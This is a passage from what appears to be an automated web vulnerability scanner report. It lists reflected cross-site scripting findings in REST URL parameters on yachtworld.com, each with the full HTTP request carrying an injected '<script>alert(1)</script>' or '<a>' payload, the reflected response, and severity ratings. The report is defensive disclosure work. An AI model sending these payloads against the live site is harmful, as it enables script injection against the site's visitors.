s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 19:51:33 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

...[SNIP]...
<a class="navFirst" href="/boats/category/typeca4fa"><a>2abff94b915/Carver/1">
...[SNIP]...

3.213. http://www.yachtworld.com/boats/category/type/Carver/1 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.yachtworld.com
Path:	/boats/category/type/Carver/1

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d108b"><a>2cf99e126b2 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /boats/category/type/Carverd108b"><a>2cf99e126b2/1 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 19:51:40 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

...[SNIP]...
<a href="/boats/category/type/Carverd108b"><a>2cf99e126b2/A-1">
...[SNIP]...

3.214. http://www.yachtworld.com/boats/category/type/Carver/1 [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/boats/category/type/Carver/1

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8d37c"><script>alert(1)</script>36ef590aaf3 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /boats/category/type/Carver/18d37c"><script>alert(1)</script>36ef590aaf3 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 19:51:48 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

...[SNIP]...
<a href="/boats/category/type/Carver/18d37c"><script>alert(1)</script>36ef590aaf3/A-1">
...[SNIP]...

3.215. http://www.yachtworld.com/boats/category/type/Catalina/1 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/boats/category/type/Catalina/1

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 17112"><script>alert(1)</script>593bf56583e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /boats/category/type17112"><script>alert(1)</script>593bf56583e/Catalina/1 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 19:51:27 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

...[SNIP]...
<a href="/boats/category/type17112"><script>alert(1)</script>593bf56583e/Catalina/Canada">
...[SNIP]...

3.216. http://www.yachtworld.com/boats/category/type/Catalina/1 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.yachtworld.com
Path:	/boats/category/type/Catalina/1

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4ef46"><a>8d04d1228f0 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /boats/category/type/Catalina4ef46"><a>8d04d1228f0/1 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 19:51:30 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

...[SNIP]...
<a href="/boats/category/type/Catalina4ef46"><a>8d04d1228f0/A-1">
...[SNIP]...

3.217. http://www.yachtworld.com/boats/category/type/Catalina/1 [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/boats/category/type/Catalina/1

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eb8b8"><script>alert(1)</script>6a854ab519a was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /boats/category/type/Catalina/1eb8b8"><script>alert(1)</script>6a854ab519a HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 19:51:38 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
